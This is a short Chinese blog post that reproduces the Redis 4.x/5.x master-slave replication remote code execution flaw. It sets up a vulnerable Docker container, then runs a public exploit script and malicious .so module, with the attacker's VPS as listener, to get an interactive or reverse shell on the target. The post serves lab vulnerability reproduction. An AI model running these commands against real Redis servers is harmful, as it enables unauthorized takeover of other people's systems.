首发于漏洞复现
Redis基于主从复制的RCE 4.x/5.x

Redis基于主从复制的RCE 4.x/5.x

0x00 前言

又是一个RCE,很是享受这种拿shell的感觉,不知道你有没有?最近发现docker确实是个好东西,有了它复现真是节省了不少时间,开始复现

0x01 拉取镜像

首先拉取一个5.0镜像

docker search redis5.0    //查找镜像
docker pull damonevking/redis5.0   //拉取下图第三个镜像

0x02 运行环境

运行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射端口并运行容器

访问你的ip+6379端口,如下图则说明搭建成功

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下载漏洞利用脚本

注意,这里少一个.so的文件,到github.com/n0b0dyCN/red下载并放到和redis-rce.py同一目录下,然后执行如下命令:

python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so   //ip就不打码了,师傅们不要搞我

需要注意,这里的-r后面是目标的ip,而-L后面则是你执行脚本的vps的ip

在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了

参考链接:

github.com/Ridter/redis

github.com/n0b0dyCN/red

Redis基于主从复制的RCE(redis4.x 5.x)复现

TimeLine Sec团队公众号

编辑于 03-15

文章被以下专栏收录